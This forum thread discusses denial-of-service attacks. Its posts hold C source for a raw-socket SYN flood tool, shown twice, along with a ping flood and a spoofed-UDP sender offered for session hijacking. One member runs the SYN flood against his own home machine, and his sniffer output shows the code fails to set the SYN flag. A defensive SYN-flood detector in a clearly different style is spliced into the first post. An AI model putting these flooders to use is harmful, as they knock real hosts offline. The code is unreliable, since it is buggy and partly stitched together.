Denial of service attack

15 years 11 months ago #28453 by sose
The piece of C code below is supposed to perform a SYN flood attack to bog down a server at the other end. I am only familiar with elementary programming in C and will rely on those among us who are familiar with advanced programming in C to make their observations and correlate the code with the explanation below.


*************************************CUT HERE**********************************

/* To keep code as small as possible, a checksum has been included which may
 * result in some packet loss. */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netdb.h>

int main(int argc, char *argv[])
{
    if(argc < 3)
    {
        printf("Usage: %s <host> <port>\n", argv[0]);
        printf("Synflood was written by shaun2k2 - shaunige@yahoo.co.uk\n");
        exit(-1);
    }

    int sock;
    char packet[4096]; /* Datagram. */
    struct sockaddr_in dest;
    struct iphdr *ip = (struct iphdr *) packet;
    struct tcphdr *tcp = (struct tcphdr *) packet + sizeof(struct iphdr);
    struct hostent *he;
    if((he = gethostbyname(argv[1])) == NULL) {
        printf("Couldn't resolve hostname!\n");
        exit(-1);
    }

    if((sock = socket (AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1) {
        printf("Socket failed!\n");
        printf("Must be root to make raw socket.\n");
        exit(-1);
    }
    dest.sin_family = AF_INET;
    dest.sin_port = htons(atoi(argv[2]));
    dest.sin_addr = *((struct in_addr *)he->h_addr);
    memset(packet, 0, 4096); // Zero out packet.

    // Fill in IP headers.
    ip->ihl = 5;
    ip->version = 4;
    ip->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
    ip->id = htons(1337);
    ip->saddr = inet_addr("127.0.0.1");
    ip->daddr = inet_ntoa(dest.sin_addr);
    ip->ttl = 255;
    ip->protocol = 6;
    ip->check = 0;
    ip->tos = 0;
    ip->frag_off = 0;

    // Fill in TCP headers.
    tcp->source = htons(1337);
    tcp->dest = htons(atoi(argv[2]));
    tcp->seq = htons(random());
    tcp->ack = 0;
    tcp->syn = 1;
    tcp->window = htons(65535);
    tcp->check = 0;
    tcp->doff = 5;
    tcp->rst = 0;
    tcp->psh = 0;
    tcp->fin = 0;
    tcp->urg = 0;
    tcp->ack_seq = htons(0);
    printf("Syn flooding: %s!\n", argv[1]);
    /* Insert some more fork()'s in here, if you want. */
    fork();
    fork();
    while(1) {
        sendto(sock, packet, ip->tot_len, 0, (struct sockaddr *)&dest,
               sizeof(struct sockaddr));
    }
    return(0);
}
*************************************CUT HERE**********************************

Host C (for Client) sends a SYN packet to host S (for Server) to request a connection, with a spoofed source IP address. Host S then replies to this packet with a SYN|ACK packet, replying to the spoofed address. The connection request is then placed on the stack until a final ACK is received. But since the source address of the SYN packet was spoofed, host S (the server) will never receive an ACK packet, because the host it sent a SYN|ACK packet to doesn't even exist, so the connection requests stay on the stack! And in a SYN flooding attack, an attacker sends literally hundreds if not thousands of packets a minute, so with all of these thousands of unanswered connection requests sitting on the stack, host S could be brought to its knees as its resources are starved and its process table is saturated. On some platforms, the machine can be brought to almost a total lockup, and the CPU utilization can be raised dramatically to 100%.

This has become a very popular and effective DoS attack, as it is a pretty easy DoS attack to launch with pre-built tools, and requires minimal knowledge of the victim host.
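The half-open state described above (a SYN answered with a SYN|ACK that never gets its final ACK) is exactly what a sniffer or an intrusion detection system counts to recognise a flood. The following is an added example and not code from this thread or from the synflood tool: it decodes constructed IPv4/TCP headers from raw bytes, pulls out the flag bits, and keeps a per-source count of bare SYNs (SYN set, ACK clear), ignoring the SYN|ACK and ACK segments of a normal handshake. The 192.168.0.x addresses, port 80, the alert threshold and the function names are assumptions chosen for the demonstration.

```c
/* Added example (not the thread's code): IPv4/TCP header decoding plus a
 * per-source bare-SYN counter, the check a sniffer or IDS uses to flag a
 * SYN flood. All packets are constructed inline; addresses are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IPV4_HDR_LEN 20
#define TCP_HDR_LEN  20
#define PKT_LEN      (IPV4_HDR_LEN + TCP_HDR_LEN)
#define MAX_SRC      16

struct tcp_summary {
    uint32_t src, dst;      /* IPv4 addresses, host byte order */
    uint16_t sport, dport;
    int syn, ack, rst, fin; /* individual TCP flag bits */
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t rd32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void wr32(uint8_t *p, uint32_t v) { wr16(p, (uint16_t)(v >> 16)); wr16(p + 2, (uint16_t)v); }

/* Decodes the IPv4 and TCP headers at the start of pkt. Returns 0 on success,
 * -1 if the bytes are not IPv4/TCP or are too short to hold both headers. */
int decode_tcp(const uint8_t *pkt, size_t len, struct tcp_summary *out) {
    if (len < IPV4_HDR_LEN) return -1;
    unsigned version = pkt[0] >> 4, ihl = (pkt[0] & 0x0f) * 4; /* ihl in bytes */
    if (version != 4 || ihl < IPV4_HDR_LEN || len < ihl + TCP_HDR_LEN) return -1;
    if (pkt[9] != 6) return -1;                  /* IP protocol 6 = TCP */
    const uint8_t *tcp = pkt + ihl;              /* TCP header follows ihl bytes of IP */
    uint8_t flags = tcp[13];                     /* bits: CWR ECE URG ACK PSH RST SYN FIN */
    out->src = rd32(pkt + 12);
    out->dst = rd32(pkt + 16);
    out->sport = rd16(tcp);
    out->dport = rd16(tcp + 2);
    out->fin = flags & 0x01;
    out->syn = (flags >> 1) & 1;
    out->rst = (flags >> 2) & 1;
    out->ack = (flags >> 4) & 1;
    return 0;
}

/* Builds a constructed 40-byte IPv4+TCP packet (no options, no payload, zero
 * checksums) so the decoder and counter can be exercised offline. */
size_t build_packet(uint8_t *buf, uint32_t src, uint32_t dst,
                    uint16_t sport, uint16_t dport, uint8_t flags) {
    memset(buf, 0, PKT_LEN);
    buf[0] = 0x45;                 /* version 4, ihl 5 (20 bytes) */
    wr16(buf + 2, PKT_LEN);        /* total length */
    buf[8] = 64;                   /* ttl */
    buf[9] = 6;                    /* protocol TCP */
    wr32(buf + 12, src);
    wr32(buf + 16, dst);
    uint8_t *tcp = buf + IPV4_HDR_LEN;
    wr16(tcp, sport);
    wr16(tcp + 2, dport);
    tcp[12] = 0x50;                /* data offset 5 words, no options */
    tcp[13] = flags;
    wr16(tcp + 14, 65535);         /* window */
    return PKT_LEN;
}

/* Per-source count of bare SYNs (SYN set, ACK clear): each one is a half-open
 * entry the victim must hold until the handshake completes or times out. */
struct syn_tracker { uint32_t src[MAX_SRC]; unsigned bare_syn[MAX_SRC]; int n; };

unsigned count_for(const struct syn_tracker *t, uint32_t src) {
    for (int i = 0; i < t->n; i++) if (t->src[i] == src) return t->bare_syn[i];
    return 0;
}

/* Records s if it is a bare SYN and returns the running count for its source;
 * returns 0 for any other segment (SYN|ACK, ACK, RST, ...), which is not counted. */
unsigned track_syn(struct syn_tracker *t, const struct tcp_summary *s) {
    if (!s->syn || s->ack) return 0;
    for (int i = 0; i < t->n; i++) if (t->src[i] == s->src) return ++t->bare_syn[i];
    if (t->n == MAX_SRC) return 0;  /* table full; a real IDS would evict or alert */
    t->src[t->n] = s->src;
    t->bare_syn[t->n] = 1;
    t->n++;
    return 1;
}

/* Replays a constructed burst: n_syn bare SYNs from 192.168.0.3 to 192.168.0.1:80,
 * then the victim's SYN|ACK and one plain ACK, which must not be counted.
 * Returns the flooder's bare-SYN count. */
unsigned demo_flood(unsigned n_syn) {
    const uint32_t attacker = 0xC0A80003u, victim = 0xC0A80001u; /* constructed */
    struct syn_tracker t = {0};
    struct tcp_summary s;
    uint8_t buf[PKT_LEN];
    for (unsigned i = 0; i < n_syn; i++) {
        build_packet(buf, attacker, victim, 1337, 80, 0x02);   /* SYN */
        if (decode_tcp(buf, PKT_LEN, &s) == 0) track_syn(&t, &s);
    }
    build_packet(buf, victim, attacker, 80, 1337, 0x12);       /* SYN|ACK */
    if (decode_tcp(buf, PKT_LEN, &s) == 0) track_syn(&t, &s);
    build_packet(buf, attacker, victim, 1337, 80, 0x10);       /* ACK */
    if (decode_tcp(buf, PKT_LEN, &s) == 0) track_syn(&t, &s);
    return count_for(&t, attacker);
}

int main(void) {
    const unsigned threshold = 100;   /* assumed alert threshold for the demo */
    unsigned seen = demo_flood(200);
    printf("192.168.0.3: %u bare SYNs%s\n", seen, seen > threshold ? " -> possible SYN flood" : "");
    return 0;
}
```

The decoder works on the raw byte layout rather than on `struct iphdr`/`struct tcphdr` casts, so it is independent of the host's struct packing, and the threshold is per source address; a flood that spoofs a fresh source on every packet would instead show up as a large number of sources each with a count of one, which is why production detectors also watch the total half-open count on the victim.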
15 years 11 months ago #28466 by talk2sp
Replied by talk2sp on topic sose code colors....
Man, Sose, the code colours are too bright. Edit it to a dark blue or quote it, then leave it as black. Finding it hard to read through... gonna be worse for someone who uses goggles!

BORN TO BE GREAT

c0de - 3
..........................................................
Take Responsibility! Don't let failures define you
15 years 11 months ago #28468 by S0lo
Replied by S0lo on topic Re: Denial of service attack
Thanks for the nice explanation, sose. I got curious about this, so I compiled the code on a Linux (SuSE-based) VMware machine and attacked my oldest tyrannosaurus home computer. Note that this is a very slow 450 MHz PIII with 256 MB on it, running WinXP. Here are the results in brief:

1. CPU usage on the victim did rise to 70%-80% but never caused the machine to hang or stop working. CPU usage dropped to normal again once the attack was stopped.

2. Sniffing the attack shows the following:



The attacker is 192.168.0.3 and the victim is 192.168.0.1.

Unfortunately, if I understand it well, it seems from this that the code did not perform the attack correctly. The SYN flag, as you can see, is equal to 0 (in all packets), although surprisingly I can see the line tcp->syn = 1; :!: The other thing is that the source address is the Linux machine itself, not random!

Needs further digging I guess.

Studying CCNP...

Ammar Muqaddas
Forum Moderator
www.firewall.cx
15 years 11 months ago #28471 by sose
Replied by sose on topic Re: Denial of service attack
*************************************CUT HERE**********************************

/* To keep code as small as possible, a checksum has been included which may
 * result in some packet loss. */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netdb.h>

int main(int argc, char *argv[])
{
    if(argc < 3)
    {
        printf("Usage: %s <host> <port>\n", argv[0]);
        printf("Synflood was written by shaun2k2 - shaunige@yahoo.co.uk\n");
        exit(-1);
    }

    int sock;
    char packet[4096]; /* Datagram. */
    struct sockaddr_in dest;
    struct iphdr *ip = (struct iphdr *) packet;
    struct tcphdr *tcp = (struct tcphdr *) packet + sizeof(struct iphdr);
    struct hostent *he;
    if((he = gethostbyname(argv[1])) == NULL) {
        printf("Couldn't resolve hostname!\n");
        exit(-1);
    }

    if((sock = socket (AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1) {
        printf("Socket failed!\n");
        printf("Must be root to make raw socket.\n");
        exit(-1);
    }
    dest.sin_family = AF_INET;
    dest.sin_port = htons(atoi(argv[2]));
    dest.sin_addr = *((struct in_addr *)he->h_addr);
    memset(packet, 0, 4096); // Zero out packet.

    // Fill in IP headers.
    ip->ihl = 5;
    ip->version = 4;
    ip->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
    ip->id = htons(1337);
    ip->saddr = inet_addr("127.0.0.1");
    ip->daddr = inet_ntoa(dest.sin_addr);
    ip->ttl = 255;
    ip->protocol = 6;
    ip->check = 0;
    ip->tos = 0;
    ip->frag_off = 0;

    // Fill in TCP headers.
    tcp->source = htons(1337);
    tcp->dest = htons(atoi(argv[2]));
    tcp->seq = htons(random());
    tcp->ack = 0;
    tcp->syn = 1;
    tcp->window = htons(65535);
    tcp->check = 0;
    tcp->doff = 5;
    tcp->rst = 0;
    tcp->psh = 0;
    tcp->fin = 0;
    tcp->urg = 0;
    tcp->ack_seq = htons(0);
    printf("Syn flooding: %s!\n", argv[1]);
    /* Insert some more fork()'s in here, if you want. */
    fork();
    fork();
    while(1) {
        sendto(sock, packet, ip->tot_len, 0, (struct sockaddr *)&dest,
               sizeof(struct sockaddr));
    }
    return(0);
}
*************************************CUT HERE**********************************
15 years 11 months ago #28472 by sose
Replied by sose on topic Re: Denial of service attack
I actually got this code from a friend.
S0lo, please can you kindly detail your attack setup using this code,
like number of systems, OS, modus operandi etc.

I also present below some code for ping of death and man in the middle attack.

*************************************CUT HERE**********************************

#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

int main(int argc, char *argv[]) {
    if(argc < 2) {
        printf("Usage: %s <host>\n", argv[0]);
        exit(0);
    }

    int sock;
    char packet[5000];
    char r[5000];
    struct sockaddr_in dest;
    struct hostent *host;
    struct iphdr *ip = (struct iphdr *) packet;
    struct icmphdr *icmp = (struct icmp *) packet + sizeof(struct iphdr);
    if((host = gethostbyname(argv[1])) == NULL) {
        printf("Couldn't resolve host!\n");
        exit(-1);
    }

    if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) {
        printf("Couldn't make socket!\n");
        printf("You must be root to create a raw socket.\n");
        exit(-1);
    }

    dest.sin_family = AF_INET;
    dest.sin_addr = *((struct in_addr *)host->h_addr);
    ip->ihl = 5;
    ip->id = htons(1337);
    ip->ttl = 255;
    ip->tos = 0;
    ip->protocol = IPPROTO_ICMP;
    ip->version = 4;
    ip->frag_off = 0;
    ip->saddr = htons("1.3.3.7");
    ip->daddr = inet_ntoa(dest.sin_addr);
    ip->tot_len = sizeof(struct iphdr) + sizeof(struct icmphdr);
    ip->check = 0;
    icmp->checksum = 0;
    icmp->type = ICMP_ECHO;
    icmp->code = 0;
    printf("Ping flooding %s!\n", argv[1]);
    fork();
    fork();
    while(1) {
        sendto(sock, packet, ip->tot_len, 0, (struct sockaddr *)&dest,
               sizeof(struct sockaddr));
    }
    return(0);
}

Now let's see the man in the middle attack (sequence number prediction)/TCP session hijacking.

This is the ultimate attack in IP spoofing: to gain a connection with a host while pretending to be another host, preferably a trusted host. All that is required is that the attacker can predict the sequence number of the server host's SYN|ACK packet after sending a SYN packet, but this is not as simple a task as one might think. First, there's the issue of actually guessing the sequence number of this packet of interest, and secondly, there's the issue of the host you are spoofing answering the SYN|ACK packet and sending a RST (reset connection) packet because it was not expecting the SYN|ACK packet. The second problem is actually simpler to deal with. A classic method of preventing the spoofed host from replying to the SYN|ACK packet with a RST is by SYN flooding it.

*************************************CUT HERE**********************************

#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/udp.h>

int main(int argc, char *argv[]) {
    if(argc < 2) {
        printf("Usage: %s <host>\n", argv[0]);
        exit(0);
    }

    int sock;
    char packet[5000];
    char msg[50] = "LOSE";
    int msglen = strlen(msg);
    struct sockaddr_in dest;
    struct hostent *host;
    int sport = 1337;
    struct iphdr *ip = (struct iphdr *) packet;
    struct udphdr *udp = (struct udphdr *) packet + sizeof(struct iphdr);
    if((host = gethostbyname(argv[1])) == NULL) {
        printf("Couldn't resolve host!\n");
        exit(-1);
    }

    if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) {
        printf("Couldn't make socket!\n");
        printf("You must be root to create a raw socket.\n");
        exit(-1);
    }

    dest.sin_family = AF_INET;
    dest.sin_addr = *((struct in_addr *)host->h_addr);
    dest.sin_port = htons(1024);

    ip->ihl = 5;
    ip->id = htons(1337);
    ip->ttl = 255;
    ip->tos = 0;
    ip->protocol = IPPROTO_UDP;
    ip->version = 4;
    ip->frag_off = 0;
    ip->saddr = htons("1.3.3.7");
    ip->daddr = inet_ntoa(dest.sin_addr);
    ip->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr);
    ip->check = 0;
    udp->source = htons(sport);
    udp->dest = htons(dest.sin_port);
    udp->len = htons(msglen + 8);
    memcpy(packet + sizeof(ip) + sizeof(udp), msg, msglen);
    printf("Sending UDP datagram.\n");
    sendto(sock, packet, ip->tot_len, 0, (struct sockaddr *)&dest,
           sizeof(struct sockaddr));
    return(0);
}

*************************************CUT HERE**********************************

There are various interesting tools in relation to TCP session hijacking attacks. Here are a few popular ones:

HUNT - packetstormsecurity.nl/sniffers/hunt/
Ettercap - ettercap.sourceforge.net/

Further interesting tools related to TCP session hijacking can be found at www.packetstormsecurity.org
15 years 11 months ago #28474 by S0lo
Replied by S0lo on topic Re: Denial of service attack

S0lo, please can you kindly detail your attack setup using this code,
like number of systems, OS, modus operandi etc.


Sure. Two PCs, A and B, connected to a small 8-port switch, both running Windows XP. PC A (with VMware installed) is running a virtual PC with Linux (SuSE 10.x). I compiled the code on the Linux VM using Eclipse IDE + CDT, then ran the attack from the Linux VM targeting PC B (B is the victim). While doing so, a sniffer (CommView) installed on PC A was sniffing its NIC that connects to the switch. The results above are the output of the sniffer.

Of course, the Linux VM is using PC A's NIC to connect to the network.

Studying CCNP...

Ammar Muqaddas
Forum Moderator
www.firewall.cx